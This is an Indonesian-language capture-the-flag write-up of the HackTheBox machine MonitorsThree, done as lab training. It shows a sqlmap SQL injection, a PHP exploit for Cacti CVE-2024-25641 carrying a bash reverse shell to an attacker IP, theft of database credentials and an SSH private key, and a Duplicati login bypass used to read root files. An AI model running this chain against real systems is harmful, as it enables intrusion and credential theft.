Halo semuanya, sekarang gw akan bahas mesin hackthebox yaitu monitorsthree.
Seperti biasa kita akan mulai dengan melakukan scanning nmap pada target, command yang gw nmap -sSCV 10.10.11.30 -T5
┌──(root㉿kali)-[~]
└─# nmap -sSCV 10.10.11.30 -T5
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-16 06:28 EST
Nmap scan report for 10.10.11.30
Host is up (0.25s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 86:f8:7d:6f:42:91:bb:89:72:91:af:72:f3:01:ff:5b (ECDSA)
|_ 256 50:f9:ed:8e:73:64:9e:aa:f6:08:95:14:f0:a6:0d:57 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://monitorsthree.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
8084/tcp filtered websnp
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.82 seconds
disini kita buka website tcp 80 nya pada browser
disini kita fokus pada menu reset password dari website /forgot_password.php
kita masukan value asal pada kolom tersebut dan capture menggunakan burpsuite
lalu kita masukan request tersebut kedalam sebuah file dan jalankan sqlmap
┌──(root㉿kali)-[~/latihan]
└─# cat request.txt
POST /forgot_password.php HTTP/1.1
Host: monitorsthree.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
Origin: http://monitorsthree.htb
Connection: keep-alive
Referer: http://monitorsthree.htb/forgot_password.php
Cookie: PHPSESSID=14qckn8kokvi5e7jaiv6is6kut
Upgrade-Insecure-Requests: 1
Priority: u=0, i
username=asdasd┌──(root㉿kali)-[~/latihan]
└─# sqlmap -r request.txt --batch --dbms=MySQL --dbs
___
__H__
___ ___[']_____ ___ ___ {1.8.11#stable}
|_ -| . [,] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 06:36:32 /2024-12-16/
[06:36:32] [INFO] parsing HTTP request from 'request.txt'
[06:36:32] [INFO] testing connection to the target URL
got a 302 redirect to 'http://monitorsthree.htb/forgot_password.php'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y
[06:36:34] [INFO] testing if the target URL content is stable
[06:36:36] [WARNING] POST parameter 'username' does not appear to be dynamic
[06:36:38] [WARNING] heuristic (basic) test shows that POST parameter 'username' might not be injectable
[06:36:40] [INFO] testing for SQL injection on POST parameter 'username'
[06:36:40] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[06:36:49] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[06:36:51] [INFO] testing 'Generic inline queries'
[06:36:52] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[06:38:26] [INFO] POST parameter 'username' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[06:38:26] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[06:38:26] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique foundsetelah mendapatkan nama dari databasenya, selanjutnya yang perlu kita lakukan adalah dump username,password dari db tersebut, dan akan ada beberapa user yang kita dapatkan.
Table: users
[4 entries]
+-----------+----------------------------------+
| username | password |
+-----------+----------------------------------+
| janderson | 1e68b6eb86b45f6d92f8f29242...... |
| admin | 31a181c8372e3afc59dab86343...... |
| dthompson | 633b683cc128fe244b00f176c8...... |
| mwatson | c585d01f2eb3e6e1073e9202........ |
+-----------+----------------------------------+selanjutnya kita akan crack user admin dengan menggunakan crackstation
selanjutnya kita akan melakukan fuzzing subdomain dari ip target kita dengan menggunakan ffuf
┌──(root㉿kali)-[~/latihan]
└─# ffuf -c -ac -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H 'Host: FUZZ.monitorsthree.htb' -u http://monitorsthree.htb
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://monitorsthree.htb
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt
:: Header : Host: FUZZ.monitorsthree.htb
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
cacti [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 251ms]Disini kita dapatkan subdomain cacti, kita akan buka di browser subdomain tersebut.
disini kita akan login menggunakan kredensial admin:green….. yang sudah kita temukan sebelumnya
kita sudah berhasil login. Selanjutnya kita akan gunakan exploit cacti version 1.2.26 CVE-2024–25641, disini script php yang bisa digunakan. Kita berikan nama test.php
<?php
$xmldata = "<xml>
<files>
<file>
<name>resource/test.php</name>
<data>%s</data>
<filesignature>%s</filesignature>
</file>
</files>
<publickey>%s</publickey>
<signature></signature>
</xml>";
$filedata = '<?php exec("bash -c \'bash -i >& /dev/tcp/10.10.14.20/4444 0>&1\'") ?>';
$keypair = openssl_pkey_new();
$public_key = openssl_pkey_get_details($keypair)["key"];
openssl_sign($filedata, $filesignature, $keypair, OPENSSL_ALGO_SHA256);
$data = sprintf($xmldata, base64_encode($filedata), base64_encode($filesignature), base64_encode($public_key));
openssl_sign($data, $signature, $keypair, OPENSSL_ALGO_SHA256);
file_put_contents("test.xml", str_replace("<signature></signature>", "<signature>".base64_encode($signature)."</signature>", $data));
system("cat test.xml | gzip -9 > test.xml.gz; rm test.xml");
?>selanjutnya kita compress untuk mendapatkan test.xml.gz
┌──(root㉿kali)-[~/latihan]
└─# php test.php
┌──(root㉿kali)-[~/latihan]
└─# ls
request.txt test.php test.xml.gzkita upload file tersebut melalui fitur import/export
kita import dan nyalakan listening di port 4444, lalu kita akses shellnya http://cacti.monitorsthree.htb/cacti/resource/test.php
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.20] from (UNKNOWN) [10.10.11.30] 47810
bash: cannot set terminal process group (1218): Inappropriate ioctl for device
bash: no job control in this shell
www-data@monitorsthree:~/html/cacti/resource$ whoami
whoami
www-data
www-data@monitorsthree:~/html/cacti/resource$disini kita lihat dari kredensial mysql default pada folder
www-data@monitorsthree:~/html/cacti/include$ cat config.php
cat config.php
<?php
$database_type = 'mysql';
$database_default = 'cacti';
$database_hostname = 'localhost';
$database_username = 'cacti....';
$database_password = 'cac......';
$database_port = '3306';
$database_retries = 5;
$database_ssl = false;
$database_ssl_key = '';
$database_ssl_cert = '';
$database_ssl_ca = '';
$database_persist = false;
disini kita langsung connect ke mysqlnya dengan menggunakan informasi tersebut
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.20] from (UNKNOWN) [10.10.11.30] 50044
bash: cannot set terminal process group (1218): Inappropriate ioctl for device
bash: no job control in this shell
www-data@monitorsthree:~/html/cacti/resource$ mysql -u cac...... -p cacti
mysql -u cactiuser -p cacti
Enter password: cactiu....lalu kita lihat data dari user_auth tables
USE cacti;
show tables;
SELECT * FROM user_auth;kita dapatkan beberapa user
id username password realm full_name email_address must_change_password password_change show_tree show_list show_preview graph_settings login_opts policy_graphs policy_trees policy_hosts policy_graph_templates enabled lastchange lastlogin password_history locked failed_attempts lastfail reset_perms
1 admin $2y$10$tjPSsSP6UovL3OTNeam4Oe24TSRuSRRApm............ 0 Administrator marcus@monitorsthree.htb on on on on 2 11 1 1 on -1 -1 -1 0 0 436423766
3 guest $2y$10$SO8woUvjSFMr1CDo8O3cz.S6uJoqLaTe6............. 0 Guest Account guest@monitorsthree.htb on on on 1 1 11 1 -1 -1 -1 0 0 3774379591
4 marcus $2y$10$Fq8wGXvlM3Le.5LIzmM9weFs9..................... 0 Marcus marcus@monitorsthree.htb on on on on on 1 1 11 1 on -1 -1 0 0 1677427318selanjutnya kita akan crack hash user marcus dengan menggunakan hashcat
disini kita dapatkan value dari hashnya. selanjutnya kita akan masuk su marcus
kita masuk ke folder ini
/home/marcus/.sshlalu kita copy file id_rsa ke attack mesin. Dan berikan permission 600
cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAqgvIpzJXDWJOJejC3CL0m9gx8IXO7UBIfGplG1XCC6GhqPQh8OXK
rPkApFwR1k4oJkxQJi0fG2oSWmssfwqwY4FWw51sNIALbSIV3UIlz8/3ufN0zmB4WHacS+
k7hOP/rJ8GjxihThmh6PzC0RbpD/wCCCvF1qX+Bq8xc7797xBR4KfPaA9OgB0uvEuzVWco
MYII6QvznQ1FErJnOiceJoxRrl0866JmOf6moP66URla5+0sLta796+ARDNMQ2g4geh53p
ja3nZYq2QAi1b66GIRmYUGz4uWunRJ+6kUvf7QVmNgmmnF2cVYFpdlBp8WAMZ2XyeqhTkh
Z4fg6mwPyQfloTFYxw1jv96F+Kw4ET1tTL+PLQL0YpHgRTelkCKBxo4/NiGs6LTEzsucyq
Dedke5o/5xcIGnU/kTtwt5xXZMqmojXOywf77vomCuLHfcyePf2vwImF9Frs07lo3ps7pK
ipf5cQ4wYN5V7I+hFcie5p9eeG+9ovdw7Q6qrD77AAAFkIu0kraLtJK2AAAAB3NzaC1yc2
EAAAGBAKoLyKcyVw1iTiXowtwi9JvYMfCFzu1ASHxqZRtVwguhoaj0IfDlyqz5AKRcEdZO
KCZMUCYtHxtqElprLH8KsGOBVsOdbDSAC20iFd1CJc/P97nzdM5geFh2nEvpO4Tj/6yfBo
8YoU4Zoej8wtEW6Q/8Aggrxdal/gavMXO+/e8QUeCnz2gPToAdLrxLs1VnKDGCCOkL850N
RRKyZzonHiaMUa5dPOuiZjn+pqD+ulEZWuftLC7Wu/evgEQzTENoOIHoed6Y2t52WKtkAI
tW+uhiEZmFBs+Llrp0SfupFL3+0FZjYJppxdnFWBaXZQafFgDGdl8nqoU5IWeH4OpsD8kH
5aExWMcNY7/ehfisOBE9bUy/jy0C9GKR4EU3pZAigcaOPzYhrOi0xM7LnMqg3nZHuaP+cX
CBp1P5E7cLecV2TKpqI1zssH++76Jgrix33Mnj39r8CJhfRa7NO5aN6bO6SoqX+XEOMGDe
VeyPoRXInuafXn........................................................
UdlPWmX9KBrTo4shGXYqytDCOUpq738zginrfiDDtO5Do4oVqN/a83X/ibBQuC0HaC0NDA
HvLQy0D4YQ6/8wE0K8MFqKUHpE2VQJvTLFl7UZ4dVkAv4JhYStnM1ZbVt5kNyQzIn1T030
zAwVsn0tmQYsTHWPSrYgd3+36zDnAJt+koefv3xsmhnYEZwruXTZYW0EKqLuKpem7algzS
Dkykbe/YupujChCK0u5KY2JL9a+YDQn7mberAY31KPAyOB66ba60FUgwECw0J4eTLMjeEA
bppHadb5vQKH2ZhebpQlTiLEs2h9h9cwuW4GrJl3vcVqV68ECGwqr7/7OvlmyUgzJFh0+8
/MFEq8iQ0VY4as4y88aMCuqDTT1x6Zqg1c8DuBeZkbvRDnU6IJ/qstLGfKmxg6s+VXpKlB
iYckHk0TAs6FDngfxiRHvIAh8Xm+ke4ZGh59WJyPHGJ/6yh3ie7Eh+5h/fm8QRrmOpAAAA
wHvDgC5gVw+pMpXUT99Xx6pFKU3M1oYxkhh29WhmlZgvtejLnr2qjpK9+YENfERZrh0mv0
GgruxPPkgEtY+MBxr6ycuiWHDX/xFX+ioN2KN2djMqqrUFqrOFYlp8DG6FCJRbs//sRMhJ
bwi2Iob2vuHV8rDhmRRq12iEHvWEL6wBhcpFYpVk+R7XZ5G4uylCzs27K9bUEW7iduys5a
ePG4B4U5NV3mDhdJBYtbuvwFdL7J+eD8rplhdQ3ICwFNC1uQAAAMEA03BUDMSJG6AuE6f5
U7UIb+k/QmCzphZ82az3Wa4mo3qAqulBkWQn65fVO+4fKY0YwIH99puaEn2OKzAGqH1hj2
y7xTo2s8fvepCx+MWL9D3R9y+daUeH1dBdxjUE2gosC+64gA2iF0VZ5qDZyq4ShKE0A+Wq
4sTOk1lxZI4pVbNhmCMyjbJ5fnWYbd8Z5MwlqmlVNzZuC+LQlKpKhPBbcECZ6Dhhk5Pskh
316YytN50Ds9f+ueqxGLyqY1rHiMrDAAAAwQDN4jV+izw84eQ86/8Pp3OnoNjzxpvsmfMP
BwoTYySkRgDFLkh/hzw04Q9551qKHfU9/jBg9BH1cAyZ5rV/9oLjdEP7EiOhncw6RkRRsb
e8yphoQ7OzTZ0114YRKdafVoDeb0twpV929S3I1Jxzj+atDnokrb8/uaPvUJo2B0eDOc7T
z6ZnzxAqKz1tUUcqYYxkCazMN+0Wx1qtallhnLjy+YaExM+uMHngJvVs9zJ2iFdrpBm/bt
PA4EYA8sgHR2kAAAAUbWFyY3VzQG1vbml0b3JzdGhyZWUBAgMEBQYH
-----END OPENSSH PRIVATE KEY-----
└─# nano id_rsa
┌──(root㉿kali)-[~/]
└─# chmod 600 id_rsasekarang waktunya kita masuk menggunakan certificate tersebut sekaligus disini kita mendapat user.txt
└─# ssh -i id_rsa marcus@monitorsthree.htb
The authenticity of host 'monitorsthree.htb (10.10.11.30)' can't be established.
ED25519 key fingerprint is SHA256:1llzaKeglum8R0dawipiv9mSGU33yzoUW3frO9MAF6U.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'monitorsthree.htb' (ED25519) to the list of known hosts.
Last login: Mon Dec 16 10:12:14 2024 from 10.10.14.14
marcus@monitorsthree:~$ whoami
marcus
marcus@monitorsthree:~$ id
uid=1000(marcus) gid=1000(marcus) groups=1000(marcus)
marcus@monitorsthree:~$ ls
root root.txt user.txt
marcus@monitorsthree:~$ cat user.txt
dcfb8aa1108a7.............disini kita akan melakukan enumerasi beberapa port yang berjalan didalam
kita akan fokus pada port 8200 dan melakukan forwarding pada port tersebut.
└─# ssh marcus@monitorsthree.htb -L 8200:127.0.0.1:8200 -i id_rsa
Last login: Mon Dec 16 12:24:18 2024 from 10.10.14.20
marcus@monitorsthree:~$ whoami
marcus
marcus@monitorsthree:~$ id
uid=1000(marcus) gid=1000(marcus) groups=1000(marcus)disini kita akan buka website 127.0.0.1:8200
ternyata duplicati! disini kita mendapatkan sqlite dari folder
marcus@monitorsthree:/opt/duplicati/config$ ls
BEJZYCVRCL.sqlite KAPRMUPHBU.sqlite SVQHETYBIZ.sqlite
control_dir_v2 KSOKYQRGYW.sqlite YAIBQSHEEN.sqlite
CTADPNHLTC.sqlite MUJQFASYFF.sqlite
Duplicati-server.sqlite SRDLRZHWGJ.sqlite
marcus@monitorsthree:/opt/duplicati/config$selanjutnya kita akan download file Duplicati-server.sqlite dengan menggunakan perintah
id_rsa request.txt test.php test.xml.gz
┌──(root㉿kali)-[~/latihan]
└─# scp -i id_rsa marcus@monitorsthree.htb:/opt/duplicati/config/Duplicati-server.sqlite .
Duplicati-server.sqlite disini sudah kita dapatkan, dan kita extract menggunakan sqlite3
└─# sqlite3 Duplicati-server.sqlite
SQLite version 3.46.1 2024-08-13 09:16:08
Enter ".help" for usage hints.
sqlite> .tables
Backup Log Option TempFile
ErrorLog Metadata Schedule UIStorage
Filter Notification Source Version
sqlite> SELECT * from Option;
4||encryption-module|
4||compression-module|zip
4||dblock-size|50mb
4||--no-encryption|true
-1||--asynchronous-upload-limit|50
-1||--asynchronous-concurrent-upload-limit|50
-2||startup-delay|0s
-2||max-download-speed|
-2||max-upload-speed|
-2||thread-priority|
-2||last-webserver-port|8200
-2||is-first-run|
-2||server-port-changed|True
-2||server-passphrase|Wb6e855L3sN9LTaC.......................
-2||server-passphrase-salt|xTfykWV1dATpFZvPhClEJLJzYA5A4L74hX7FK8XmY0I=
-2||server-passphrase-trayicon|b37b4dd0-4b8e-444a-8ab3-69621532d747
-2||server-passphrase-trayicon-hash|FgfAQcfzB0ZD3JlehexXU+49ISpfSFjcysqsJofnwUg=
-2||last-update-check|638699303127336780
-2||update-check-interval|
-2||update-check-latest|
-2||unacked-error|True
-2||unacked-warning|False
-2||server-listen-interface|any
-2||server-ssl-certificate|
-2||has-fixed-invalid-backup-id|True
-2||update-channel|
-2||usage-reporter-level|
-2||has-asked-for-password-protection|true
-2||disable-tray-icon-login|false
-2||allowed-hostnames|*disini kita akan coba inputkan password pada login, dan bisa kita perhatikan
salt disini sesuai dengan yang kita dapatkan pada sqlite tadi. Disini kita akan coba decode dengan command berikut
echo 'Wb6e855L3sN9LTaCuwPXuau.............' | base64 -d | xxd -p -c 256kita dapatkan valuenya
disini adalah step yang ckup rumit
1. Intercept burpsuite on
2. masukan password di duplicati
3. request pertama lakukan > do intercept > maka disini kita akan mendapatkan value nonce
simpan value nonce lalu buka console pada browser, gunakan perintah berikut
1. var saltedpwd = '59be9ef39e4bdec37d2d3682bb03d7b9abadb............';
2. var noncedpwd = CryptoJS.SHA256(CryptoJS.enc.Hex.parse(CryptoJS.enc.Base64.parse('NonceFromBurp') + saltedpwd)).toString(CryptoJS.enc.Base64);
3. console.log(noncedpwd);selanjutnya bisa ikuti perintah ini lebih jelasnya https://github.com/duplicati/duplicati/issues/5197
ketika sudah berhasil login, selanjutnya kita akan add backup
disini kita add manual foldernya
kita add pathnya /source/root/root.txt lalu klik add path
disable automatically run backups, dan kita pilih next dan save. Lalu refresh webpagenya maka akan muncul backup dengan nama root_flag
klik run now, dan kita pindah ke menu restore
kita pilih root.txt lalu continue. Setelah itu kita pilih pick location dengan memberikan path /source/home/marcus/root.txt lalu klik continue
kita kembali ke shell marcus lalu kita akan melihat folder root.txt beserta didalamnya flag root
marcus@monitorsthree:~$ cd root.txt/
marcus@monitorsthree:~/root.txt$ ls
root.txt
marcus@monitorsthree:~/root.txt$ cat root.txt
935c670732bc....................